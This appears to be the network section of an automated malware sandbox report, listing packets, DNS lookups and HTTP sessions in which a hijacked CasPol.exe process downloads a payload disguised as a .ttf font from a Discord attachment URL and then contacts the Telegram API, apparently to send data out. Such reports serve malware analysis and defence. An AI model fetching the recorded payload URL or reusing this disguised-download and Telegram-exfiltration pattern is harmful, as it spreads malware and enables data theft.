                                                                                    Aug 22, 2022 01:57:29.601875067 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.601895094 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.602092028 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.602129936 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.602273941 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.602291107 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.602309942 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.602459908 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.602519035 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.602535963 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.602689028 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.602720976 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.602874994 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.602894068 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.602909088 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.603085995 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.603106976 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.603135109 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.603293896 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.603319883 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.603338957 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.603506088 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.603523016 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.603538036 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.603698969 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.603725910 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.603732109 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.603744030 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.603876114 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.603969097 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.604059935 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.604085922 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.604244947 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.604285955 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.604295969 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.604315996 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.604435921 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.604532003 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.604612112 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.604648113 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.604796886 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.604856014 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.604958057 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.604985952 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.605009079 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.605163097 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.605232000 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.605398893 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.605432034 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.605454922 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.605580091 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.605732918 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.609867096 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.610013962 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.610040903 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.610059977 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.610091925 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.610251904 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.610390902 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.610572100 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.610615015 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.610624075 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.610869884 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.611008883 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.611088991 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.611118078 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.611248970 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.611371040 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.611381054 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.611392021 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.611414909 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.611566067 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.611584902 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.611640930 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.611936092 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.611968994 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.612059116 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.612200975 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.612306118 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.612325907 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.612354040 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.612370968 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.612544060 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.612575054 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.612584114 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.612592936 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.612606049 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.612723112 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.612854958 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.612900019 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.612910986 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.612962008 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.613213062 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.618408918 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.618633032 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.618777037 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.618954897 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.619002104 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.619024992 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.619043112 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.619162083 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.619193077 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.619348049 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.621443033 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.621643066 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.621704102 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.621856928 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.622051001 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.622339964 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.622510910 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.622525930 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.622560978 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.622711897 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.622772932 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.622793913 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.622802973 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.622819901 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.622980118 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.623038054 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.623060942 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.623076916 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.623207092 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.623255014 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.623395920 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.623404026 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.623426914 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.623589039 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.623621941 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.623631001 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.623640060 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.623647928 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.623660088 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.623761892 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.623892069 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.623996973 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.624011040 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.624025106 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.624042034 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.624191999 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.624221087 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.624304056 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.624366999 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.624388933 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.624394894 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.624413013 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.624552965 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.624579906 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.624706984 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.624782085 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.624800920 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.624815941 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.624821901 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.624829054 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.624963999 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.624982119 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.625010967 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.625319958 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.625346899 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.625396013 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.625571012 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.625670910 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.625689983 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.625698090 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.625714064 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.625848055 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.625859976 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.626015902 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.626044989 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.626059055 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.626072884 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.626077890 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.626086950 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.626238108 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.626251936 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.626286983 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.626437902 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.626528978 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.626552105 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.626631975 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.626689911 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.626713991 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.626718998 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.626811028 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.626847982 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.626863003 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.627036095 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.627051115 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.627065897 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.627072096 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:41.174098015 CEST49751443192.168.11.20149.154.167.220
                                                                                    Aug 22, 2022 01:57:41.174173117 CEST44349751149.154.167.220192.168.11.20
                                                                                    Aug 22, 2022 01:57:41.174324989 CEST49751443192.168.11.20149.154.167.220
                                                                                    Aug 22, 2022 01:57:41.179647923 CEST49751443192.168.11.20149.154.167.220
                                                                                    Aug 22, 2022 01:57:41.179707050 CEST44349751149.154.167.220192.168.11.20
                                                                                    Aug 22, 2022 01:57:41.242813110 CEST44349751149.154.167.220192.168.11.20
                                                                                    Aug 22, 2022 01:57:41.243040085 CEST49751443192.168.11.20149.154.167.220
                                                                                    Aug 22, 2022 01:57:41.244669914 CEST49751443192.168.11.20149.154.167.220
                                                                                    Aug 22, 2022 01:57:41.244718075 CEST44349751149.154.167.220192.168.11.20
                                                                                    Aug 22, 2022 01:57:41.245346069 CEST44349751149.154.167.220192.168.11.20
                                                                                    Aug 22, 2022 01:57:41.248579979 CEST49751443192.168.11.20149.154.167.220
                                                                                    Aug 22, 2022 01:57:41.267458916 CEST44349751149.154.167.220192.168.11.20
                                                                                    Aug 22, 2022 01:57:41.267937899 CEST49751443192.168.11.20149.154.167.220
                                                                                    Aug 22, 2022 01:57:41.310556889 CEST44349751149.154.167.220192.168.11.20
                                                                                    Aug 22, 2022 01:57:41.343404055 CEST44349751149.154.167.220192.168.11.20
                                                                                    Aug 22, 2022 01:57:41.343571901 CEST44349751149.154.167.220192.168.11.20
                                                                                    Aug 22, 2022 01:57:41.343796968 CEST49751443192.168.11.20149.154.167.220
                                                                                    Aug 22, 2022 01:57:41.346585989 CEST49751443192.168.11.20149.154.167.220
                                                                                    Aug 22, 2022 01:59:19.057818890 CEST4974880192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:59:19.067126036 CEST8049748162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:59:19.067290068 CEST4974880192.168.11.20162.159.130.233
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Aug 22, 2022 01:57:29.087831020 CEST5108253192.168.11.201.1.1.1
                                                                                    Aug 22, 2022 01:57:29.096859932 CEST53510821.1.1.1192.168.11.20
                                                                                    Aug 22, 2022 01:57:41.152808905 CEST5234653192.168.11.201.1.1.1
                                                                                    Aug 22, 2022 01:57:41.161937952 CEST53523461.1.1.1192.168.11.20
                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                    Aug 22, 2022 01:57:29.087831020 CEST192.168.11.201.1.1.10x238bStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                    Aug 22, 2022 01:57:41.152808905 CEST192.168.11.201.1.1.10xddebStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                    Aug 22, 2022 01:57:29.096859932 CEST1.1.1.1192.168.11.200x238bNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                    Aug 22, 2022 01:57:29.096859932 CEST1.1.1.1192.168.11.200x238bNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                    Aug 22, 2022 01:57:29.096859932 CEST1.1.1.1192.168.11.200x238bNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                    Aug 22, 2022 01:57:29.096859932 CEST1.1.1.1192.168.11.200x238bNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                    Aug 22, 2022 01:57:29.096859932 CEST1.1.1.1192.168.11.200x238bNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                    Aug 22, 2022 01:57:41.161937952 CEST1.1.1.1192.168.11.200xddebNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                    • cdn.discordapp.com
                                                                                    • api.telegram.org
                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    0192.168.11.2049749162.159.130.233443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                    TimestampkBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    1192.168.11.2049751149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                    TimestampkBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    2192.168.11.2049748162.159.130.23380C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    Aug 22, 2022 01:57:29.115483046 CEST210OUTGET /attachments/956928735397965906/1011024921868116099/ljkfuP193.ttf HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Host: cdn.discordapp.com
                                                                                    Cache-Control: no-cache
                                                                                    Aug 22, 2022 01:57:29.130024910 CEST211INHTTP/1.1 301 Moved Permanently
                                                                                    Date: Sun, 21 Aug 2022 23:57:29 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Mon, 22 Aug 2022 00:57:29 GMT
                                                                                    Location: https://cdn.discordapp.com/attachments/956928735397965906/1011024921868116099/ljkfuP193.ttf
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cgyF9rsj5WCSB1fqq6gjSS%2BKa4h%2FMWru%2B9ZVHl8iVTb3Y%2BuinarODSXr40Dnt3FCvNQw4KCUQZg4mpeNwnasgN9MImtjYbINq6Ntpz7c2jsChB8bnWSuRlSYdSI%2FKDOelTr4GA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 73e74fb10a8f5bdd-FRA
                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    0192.168.11.2049749162.159.130.233443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2022-08-21 23:57:29 UTC0OUTGET /attachments/956928735397965906/1011024921868116099/ljkfuP193.ttf HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Cache-Control: no-cache
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2022-08-21 23:57:29 UTC0INHTTP/1.1 200 OK
                                                                                    Date: Sun, 21 Aug 2022 23:57:29 GMT
                                                                                    Content-Type: application/font-sfnt
                                                                                    Content-Length: 215104
                                                                                    Connection: close
                                                                                    CF-Ray: 73e74fb2691d926b-FRA
                                                                                    Accept-Ranges: bytes
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment;%20filename=ljkfuP193.ttf, attachment
                                                                                    ETag: "b3ebe9850b954e92f9df02b1ce13d6d7"
                                                                                    Expires: Mon, 21 Aug 2023 23:57:29 GMT
                                                                                    Last-Modified: Sun, 21 Aug 2022 21:32:05 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: MISS
                                                                                    Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                    x-goog-generation: 1661117525361485
                                                                                    x-goog-hash: crc32c=gDamsQ==
                                                                                    x-goog-hash: md5=s+vphQuVTpL53wKxzhPW1w==
                                                                                    x-goog-metageneration: 1
                                                                                    x-goog-storage-class: STANDARD
                                                                                    x-goog-stored-content-encoding: identity
                                                                                    x-goog-stored-content-length: 215104
                                                                                    X-GUploader-UploadID: ADPycdvjq2OqA4bcS2v46CJ-nVs5Oif9FHfqW6qwjlTOsuVVzy554xZWSobwVRe17zJDe5M4I2ilkI7Nkrf-wyfO7cAd1GO15ZdE
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wjM1VoN9vaRugAi%2FY63dhPTjyHP3jWdFqxpgthl9eESsXdqxf%2Bfy3PgQ8DvyQ6vC9%2Fb4Y3Ka0Vsd0nsARg61dP3FWcN6TugPqkReVsW7wXcCriN1eoZGNWjDBT%2FvizRPJrkx9Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    2022-08-21 23:57:29 UTC1INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                    Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                    2022-08-21 23:57:29 UTC1INData Raw: 49 42 07 76 cc 95 c4 d9 08 61 7c af 16 1d 4f a5 9c 4a df 45 13 30 83 5a 4e 70 b6 06 6a 3c 7a 8c 42 04 1a 2e 22 43 f7 33 b6 74 9b 5e af 4c 5d 83 f8 22 f6 63 f0 f3 fe 4a 6d 8b d3 a3 75 73 f5 55 f2 f0 34 08 99 9a 6b c0 20 25 87 9b 80 97 bf 17 dc 0f 6b 8d 39 37 a0 50 79 d0 c0 a2 c6 bf ad 6e d0 34 c6 10 f2 96 cc 09 66 f1 a1 f9 6c 53 e9 ad f8 0c 52 30 18 63 08 95 87 6c 0b ba d3 7a 6a 46 ef 1c f5 3c fa 5d cd 19 ec c9 98 fd 8c ea b0 cd 81 66 2a 48 87 22 09 2c e3 44 ed e4 8f 10 1c f1 19 12 e2 f3 ef a3 a5 17 f1 af 29 b5 32 66 76 4b db 31 da 6b 41 d7 a1 98 4f e4 af 9b 17 f6 1d 48 74 d0 29 bc b5 8b 19 a5 d5 03 98 fa be e1 5a bc 30 2b 09 e2 73 8c 56 eb 6b ad aa e3 bd 68 25 2d c6 4b b1 3a 13 37 fc 61 ce de ac f2 9f 2c 99 21 67 db 59 ea d0 2f 48 22 3c b4 d1 ee d4 55 ba
                                                                                    Data Ascii: IBva|OJE0ZNpj<zB."C3t^L]"cJmusU4k %k97Pyn4flSR0clzjF<]f*H",D)2fvK1kAOHt)Z0+sVkh%-K:7a,!gY/H"<U
